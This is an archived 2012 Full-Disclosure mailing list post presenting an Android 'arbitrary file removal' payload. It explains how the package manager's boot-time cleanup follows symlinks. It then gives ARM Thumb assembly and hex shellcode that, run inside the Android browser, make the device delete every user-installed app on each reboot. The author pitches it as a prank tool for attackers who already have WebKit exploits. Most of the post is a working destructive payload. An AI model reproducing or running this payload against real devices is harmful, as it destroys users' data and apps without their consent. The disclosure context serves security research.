lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sun, 01 Apr 2012 13:39:49 -0400
From: Dan Rosenberg <dan.j.rosenberg@...il.com>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: An April Fools' Day Android Payload

/*
 * Android Arbitrary File Removal Payload
 * by Dan Rosenberg (@djrbliss)
 *
 * Android differentiates between "system" applications and user-installed
 * applications, where the former are OEM-shipped and installed in
/system/app
 * rather than /data/app (this has nothing to do with the privileges
with which
 * these applications run).  On boot, the Android package manager does a
sanity
 * check on system apps to ensure their native library directories, in
 * /data/data/[app]/lib, are empty, and if not, empties them by unlinking
 * everything inside.  This check will happily follow symbolic links, so
if you
 * can run code in the context of a system application (such as the
browser),
 * you can replace its lib/ directory with a symlink to a target directory,
 * which will be (non-recursively) emptied on every subsequent reboot
until the
 * symlink is removed.  Of course this will only remove files on filesystems
 * mounted read-write (usually not /system).
 *
 * I expect this will be useful for APT attackers who have Webkit
exploits, are
 * really bored, and want to play pranks on their victims. :p
 *
 * This ARM payload removes all user-installed applications on reboot,
freeing
 * you from the shackles of your Twitter addiction.  This example must
be run
 * in the context of the Android browser.
 *
 *   char payload[] = "\x04\xa0\x28\x27\x00\xdf\x0c\xa0\x02\xa1\x53\x27\x00"
 *                    "\xdf\x01\x27\x00\xdf\xc0\x46\x2f\x64\x61\x74\x61\x2f"
 *                    "\x64\x61\x74\x61\x2f\x63\x6f\x6d\x2e\x61\x6e\x64\x72"
 *                    "\x6f\x69\x64\x2e\x62\x72\x6f\x77\x73\x65\x72\x2f\x6c"
 *                    "\x69\x62\x00\x00\x2f\x64\x61\x74\x61\x2f\x61\x70\x70"
 *                    "\x00\xc0\x46";
 */

.equ    NR_exit,    1
.equ    NR_rmdir,   40
.equ    NR_symlink, 83

.thumb
.text

start:

.Lrmdir:
    adr r0, .Llib
    mov r7, #NR_rmdir
    swi #0

.Lsymlink:
    adr r0, .Lapps
    adr r1, .Llib
    mov r7, #NR_symlink
    swi #0

.Lexit:
    mov r7, #NR_exit
    swi #0

.align
.Llib:
    .asciz "/data/data/com.android.browser/lib"

.align
.Lapps:
    .asciz "/data/app"

.end

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ